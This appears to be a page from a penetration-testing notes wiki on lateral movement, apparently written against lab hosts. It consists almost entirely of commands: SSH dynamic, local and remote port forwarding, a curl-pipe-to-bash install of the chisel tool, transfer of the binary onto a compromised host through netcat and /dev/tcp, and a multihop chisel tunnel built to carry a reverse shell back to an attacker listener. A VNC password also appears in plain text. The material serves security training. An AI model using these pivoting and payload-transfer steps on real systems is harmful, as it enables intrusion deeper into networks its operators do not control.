Lateral Movement

SSH Tunneling

Dynamic Port Forwarding

Check proxychains port
tail /etc/proxychains.conf
Create a SOCK proxy
ssh charix@10.10.10.84 -D 9050
Now just use proxychains:
proxychains vncviewer 127.0.0.1:5901 -passwd secret

Local Port Forwarding

ssh -L PORT:localhost:PORT user@remotehost.com
Without interactive session
ssh -L 8080:127.0.0.1:8080 -N -vv User@REemoteHost

Remote Port Forwarding

ssh root@10.10.10.65 -R 4443:10.10.14.6:443
chisel
Install chisel
curl https://i.jpillora.com/chisel! | bash

Transfer chisel to a target

Copy the binary
cp /usr/local/bin/chisel .
Set netcat
nc -lvnp 80 < chisel

Now on the remote host

cd /var/tmp
cat < /dev/tcp/10.10.14.172/80 > chisel
bash -c "cat < /dev/tcp/172.19.0.4/7011 > chisel"
chmod 755 /var/tmp/chisel

Create a tunnel

Start the server locally
/usr/local/bin/chisel server -p 8002 -reverse -v
Start the tunnel remotely
/var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80

Multihop tunnel for reverse shell

  • First start the new server on your attacking host:

/usr/local/bin/chisel server -p 5000 -reverse -v

  • Set also the listener:

nc -lvnp 9005

  • Now set the first hop:

/var/tmp/chisel client 10.10.14.172:5000 6010:127.0.0.1:5000

  • Finally set the second hop:

/var/tmp/chisel client 172.19.0.4:6010 7020:127.0.0.1:9005 &
PreviousThunderbirdNextPersistence

Last updated